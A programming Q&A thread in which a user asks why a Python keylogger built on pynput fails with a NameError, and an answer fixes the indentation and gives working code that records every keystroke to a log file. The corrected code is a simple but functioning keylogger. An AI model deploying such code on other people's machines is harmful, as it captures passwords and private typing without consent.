# i'm doing a keyloggerin python but then i have some problems

Tags: python

```
from pynput.keyboard import Listener

def anonymous(key):
    key = str(key)
    if key == "Key.f12":
        raise SystemExit(0)
    if key == "Key.ctrl_l":
        print("")
with open("log.txt", "a") as file:
        file.write(key)
print(key)

with Listener(on_press=anonymous) as listener:
    listener.join()
```

*But when i started to run code this happened:
F:\hz>python a.py
Traceback (most recent call last):
File "F:\hz\a.py", line 10, in 
file.write(key)
NameError: name 'key' is not defined

Comment: Your `with` block is not indented to be inside the `anonymous` function.

Answer (score 0):

key is a local variable of your anonymous funcion.

so you cant use it outside of it like you try in your with block and print statement.

if you move it insde the function it works just fine.

```
from pynput.keyboard import Listener

def anonymous(key):
    key = str(key)
    if key == "Key.f12":
        raise SystemExit(0)
    if key == "Key.ctrl_l":
        print("")
    with open("log.txt", "a") as file:
            file.write(key)
            file.close()
    print(key)

with Listener(on_press=anonymous) as listener:
    listener.join()
```